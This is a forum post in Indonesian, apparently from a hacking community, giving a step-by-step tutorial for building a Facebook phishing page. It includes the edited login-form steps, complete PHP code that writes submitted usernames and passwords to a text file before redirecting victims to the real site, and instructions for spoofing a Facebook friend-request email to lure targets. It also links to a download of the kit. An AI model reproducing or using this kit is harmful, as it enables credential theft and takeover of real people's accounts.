intinya sm aja keq phising(redirect session) yg umum.. (no clickjacking)
Facebook phising methode by mail
step-step :
1. buka http://www.facebook.com/login.php, lalu view source. copy dan paste ke notepad.
Cari "action=" (tanpa quote) dan kita akan memulai editingnya.
pada lingkaran merah action="https://login.facebook.com/login.php" rubahlah menjadi action="next.php"
pada lingkaran biru, rubah methode dari "POST" menjadi "get"
simpan notepad ini menjadi index.php (jangan html)
2. buka notepad baru isikan kode berikut :
Code:
<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
simpan sebagai next.php
3. buka notepad lagi biarkan kosong, lalu simpan dng nama pass.txt.
Upload 3 file tersebut "index.php, next.php, pass.txt" kedalam hosting misalnya 110mb.com, spam.com atau 007sites.com.
OK, Kamu sudah punya phising page facebook skrang.
4. Langkah-langkah spoofing.
copy content asli undangan pertemanan dari facebook.
edit hyperlink dari : http:/www.facebook.com/n/?reqs.php ganti dengan halaman phising anda, hal ini tidak akan merubah tampilan di content asli facebook tapi tetap mengarah ke halaman phising kamu.
phising siap dikirim ke korban kamu.
concept : http://babel.web.id/facebook/
file coding : http://babel.web.id/facebook/fb.rar
nb : nama file bisa dirubah sesuai keinginan,.metoda selain mail masih bs diterapkan (clickjacking, fake link,dll)
================================================== ==========
write by: plaque jasakom member, edited by bl00di3z jasakom legend
Share This Thread